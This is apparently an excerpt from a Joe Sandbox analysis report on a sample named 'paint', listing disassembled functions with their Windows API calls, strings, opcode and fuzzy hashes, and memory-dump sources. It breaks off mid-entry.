Part of subcall function 00007FF6F0BEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9CE
Part of subcall function 00007FF6F0BEA9B8: GetLastError.KERNEL32(?,?,?,00007FF6F0BF2D92,?,?,?,00007FF6F0BF2DCF,?,?,00000000,00007FF6F0BF3295,?,?,?,00007FF6F0BF31C7), ref: 00007FF6F0BEA9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6F0BF617C), ref: 00007FF6F0BF5F63

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction ID: 61beec96e97131efd3c013a54083263a9fac423be72d3eb15e6dbd9ada95775e
Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction Fuzzy Hash: B951C03AA08642A6E720EF71D9811A96768BF59784FC09135EA6EC77D2FF3DE4008740

Function 00007FF6F0BDD080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6F0BDD0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF6F0BDD0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF6F0BDD0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF6F0BDD0D6

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: eee3c823fc881fc21cfe4bc9e261bd79af26559fa7f61b5d06186eabb499b955
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: 0D111866B18B05DAEB00CBA0E8552A933A4FB19758F441E35DA6E877A4EF78D1588340

Function 00007FF6F0BF3C80 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF6F0BF3CE6
memcpy_s.LIBCPMT ref: 00007FF6F0BF3D11

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: a1a9a9fab821bdc07b198e79882312b254f558d08189583254a99053341128c3
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: 15C15876B1C28697D720CF59A14466AB7A5F795B85F808134DB5F87784EF3EE800CB00

Function 00007FF6F0BDA4E4 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6F0BDA5CB
unknown header flags set, xrefs: 00007FF6F0BDA535
header crc mismatch, xrefs: 00007FF6F0BDA991

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction ID: 813dcac832b629411cad8f6764b9d65285a7b25fb9c14ea966743f721ad99288
Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction Fuzzy Hash: 56F1A472A0A3C59BE7958F14C088B3AFAAAEF46744F454538DA5A873D0EF3ED941C740

Function 00007FF6F0BF9798 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF6F0BF99E7
RaiseException.KERNEL32 ref: 00007FF6F0BF99F8

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction ID: bf38bf4bdb3cc73b201c2c7877cc2adca32fcb73bb4533c166dd0cf180f40708
Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction Fuzzy Hash: 28B17D77A04B868BEB15CF29C44636837A4F785B88F55C825DE6E837A8DF3AD451C700

Function 00007FF6F0BE3A14 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF6F0BE3B82
, xrefs: 00007FF6F0BE3DC4

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction ID: a9764692cf196b1b657071043687f70e7be72781cfc9cb38518069fe076d81f4
Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction Fuzzy Hash: 57E1B532A08646A6EB688F25865813D33A0FF46F48FA45175DA6F877D4EF2BE851C700

Function 00007FF6F0BDA34B Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

invalid window size, xrefs: 00007FF6F0BDA4B2
incorrect header check, xrefs: 00007FF6F0BDA4CB

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction ID: ff6d81cb96ca947db5a6f49a7ddb63160a27be4d8a24ec7bc52c3292300989f0
Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction Fuzzy Hash: F891A572A192C697E7A48A14C498B3EBAAAFF45350F514139DA6B867C0EF3DE540CB00

Function 00007FF6F0BEDF60 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FF6F0BEE0EA
e+000, xrefs: 00007FF6F0BEE06D

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction ID: 2a75c06cdccf0d375d03c0d5dff1817b004744467cdfb21f64f4985c75671d58
Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction Fuzzy Hash: D3517C72B186C196E724CE359801769A792E746B94F889271CB7D87BC6EFBEE044C700

Function 00007FF6F0BEDACC Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF6F0BEDE0E

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: 8afe3fc3524d0eda2bf693267bb62656179b287236e0b2173fa557071910e25f
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: B0A16763B087C556EB21CF25A4007A97B91EB627C4F458171DEAE877C5EEBEE501C700

Function 00007FF6F0BE8804 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF6F0BE8823

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
Instruction ID: dbb1ac001a5759ab6cfa1e9cfd5518e748cf5666c63f19a023bfb52e4c78753e
Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
Instruction Fuzzy Hash: 5051DE09F08A4271FB64AB26590117A5295AF86BC4FC855B4DE2FC77D2FE3EF4028200

Function 00007FF6F0BF34F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6F0BF34F4

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction ID: 501b365ff9e935f7298d7e7ddb6d2741dd84381c00bd483b04cc63e01d490d43
Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction Fuzzy Hash: 58B09224E07A02E2EF082B656C8661826A87F58701F980138C02D81370EE3C20E55700

Function 00007FF6F0BE3610 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction ID: 48a7e2223c719c0503986083ac6f612477f76236eda850cc1ea1da754b189a27
Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction Fuzzy Hash: 71D1D8A6A0864265EB688E25825863D33A0EF47F48F954275CE2F877D5EF3FE845C340

Function 00007FF6F0BD9870 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction ID: 839847ae1af61c489fd16c76e75cd453fac5922a8fddb8aa7e2dfc53dd91dd61
Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
Instruction Fuzzy Hash: 96C18D762281E08BD289EB29E87947A73D1F78A30DBD5406BEF87477C5CA3CA514DB10

Function 00007FF6F0BE2C80 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction ID: f71af0e7937cfd9783f52e275d11338553105824eae40416de56736f4054c508
Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
Instruction Fuzzy Hash: 7FB17B72A0879595EB648F29C45023C3BB0FB4AB48FA841B5CB5E873D5EF3AE841C740

Function 00007FF6F0BEE5E0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction ID: b02b44d9b02988c685565729100f05432684a321b2af1ff3b9a5372e4971b4fb
Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction Fuzzy Hash: CA812772A0C78156E774CF19944037A7A92FB46794F904235DABE83BD9EF7EE4008B00

Function 00007FF6F0BF6488 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 0ac6b4c320f8a85a272a2d207e476957e076465a5e78eda0eae0a584ad6410a5
Instruction ID: 5c9fdf271c8c6bcaf172e7b3073dd97e586856816253c8a74035ec71a1465622
Opcode Fuzzy Hash: 0ac6b4c320f8a85a272a2d207e476957e076465a5e78eda0eae0a584ad6410a5
Instruction Fuzzy Hash: 07610526E0C29676FB248AA8801427D669CAF52761F940239DE3FD77C5FE7FE8008700

Function 00007FF6F0BE21D4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: ee198130ed90acc7f9a5cb2b705a1e3f85bac27b8f891d0875293292d95f18f2
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: B0519476A1865196E7248B29C04023C33A0FB56B68F644271CF6E877D4EF3BE843CB44

Function 00007FF6F0BE19B4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: cf412da7310da430a225ca41011245f15dbfd50eee92b7f0575a9b44f7eb4af3
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: 0351A276A1965192E7248B29C04023C33A1EB46F68FB45571CEAE977E5EF3BE843C740

Function 00007FF6F0BE1DC4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: 6b8c970c9762ff1942de12af720c3b10726cb097bfc377d932ea203c94ed42cf
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 81518436A1865296E7248B29D04023C37A0EB5AB58F744671DE6E977D4EF3BEC43C780

Function 00007FF6F0BE1BC0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 9fd69c61775f77ec1da0db9af4af81c825d612f7616e4e4924b85eef85613cbd
